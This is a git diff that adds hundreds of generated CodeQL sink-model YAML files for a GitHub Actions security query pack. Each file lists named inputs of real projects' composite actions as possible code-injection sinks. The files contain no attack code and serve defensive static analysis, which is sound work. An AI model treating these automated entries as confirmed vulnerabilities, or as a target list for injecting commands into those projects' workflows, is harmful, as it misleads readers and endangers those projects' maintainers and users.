.../composite-actions/xrplf_rippled.model.yml | 8 +++++++ .../composite-actions/zcash_zcash.model.yml | 7 ++++++ .../zenml-io_zenml.model.yml | 6 +++++ .../composite-actions/zeroc-ice_ice.model.yml | 7 ++++++ 315 files changed, 2594 insertions(+) create mode 100644 ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/adap_flower.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/anchore_grype.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/anchore_syft.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/ansible_awx.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/apache_arrow.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/apache_brpc.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/apache_camel.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/apache_flink.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml create mode 100644 
ql/lib/ext/generated/composite-actions/apache_opendal.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/apache_pekko.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/apache_superset.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/armbian_build.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/badges_shields.model.yml create mode 100644 
ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/coder_coder.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml create mode 100644 
ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/discourse_.github.model.yml create mode 100644 
ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/emberjs_data.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/erlang_otp.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/expensify_app.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/expo_expo.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/facebook_flow.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml create mode 100644 
ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/github_ruby.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/google_dagger.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml create mode 100644 
ql/lib/ext/generated/composite-actions/grote_transportr.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/infracost_actions.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml create mode 100644 
ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml create mode 100644 
ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml create mode 100644 
ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/nektos_act.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml create mode 100644 
ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/oracle_graal.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/owntracks_android.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/php_php-src.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/primer_react.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/psf_black.model.yml create mode 100644 
ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/python_mypy.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/quay_clair.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/randombit_botan.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/rook_rook.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/roots_trellis.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/ruby_debug.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml create mode 100644 
ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/scitools_iris.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml create mode 100644 
ql/lib/ext/generated/composite-actions/stellar_go.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/subquery_subql.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/swagger-api_swagger-parser.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/tarantool_tarantool.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/telepresenceio_telepresence.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/tensorflow_datasets.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/texstudio-org_texstudio.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/toeverything_affine.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/treeverse_lakefs.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/trezor_trezor-firmware.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/tribler_tribler.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/trunk-io_trunk-action.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/unidata_metpy.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/unstructured-io_unstructured.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml create mode 100644 
ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml create mode 100644 ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml diff --git a/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml b/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml new file mode 100644 index 000000000000..4bc9d5ed7712 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml 
@@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["actions/actions-runner-controller", "*", "inputs.image-tag", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "inputs.image-name", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "inputs.arc-controller-namespace", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "inputs.arc-namespace", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "inputs.arc-name", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "inputs.repo-name", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "inputs.repo-owner", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "inputs.workflow-file", "code-injection", "generated"] + - ["actions/actions-runner-controller", "*", "inputs.auth-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/adap_flower.model.yml b/ql/lib/ext/generated/composite-actions/adap_flower.model.yml new file mode 100644 index 000000000000..3ce175684905 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/adap_flower.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["adap/flower", "*", "inputs.poetry-version", "code-injection", "generated"] + - ["adap/flower", "*", "inputs.setuptools-version", "code-injection", "generated"] + - ["adap/flower", "*", "inputs.pip-version", "code-injection", "generated"] + - ["adap/flower", "*", "inputs.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml b/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml new file mode 100644 index 000000000000..80a23352e55b --- /dev/null 
+++ b/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["agoric/agoric-sdk", "*", "inputs.xsnap-random-init", "code-injection", "generated"] + - ["agoric/agoric-sdk", "*", "inputs.path", "code-injection", "generated"] + - ["agoric/agoric-sdk", "*", "inputs.ignore-endo-branch", "code-injection", "generated"] + - ["agoric/agoric-sdk", "*", "inputs.codecov-token", "code-injection", "generated"] + - ["agoric/agoric-sdk", "*", "inputs.datadog-token", "code-injection", "generated"] + - ["agoric/agoric-sdk", "*", "inputs.datadog-site", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml b/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml new file mode 100644 index 000000000000..441c8ebcd52a --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["airbnb/lottie-ios", "*", "inputs.xcode", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml b/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml new file mode 100644 index 000000000000..d4e8a2c32bf3 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["airbytehq/airbyte", "*", "inputs.options", "code-injection", "generated"] + - ["airbytehq/airbyte", "*", "inputs.subcommand", "code-injection", "generated"] \ No newline at end of file 
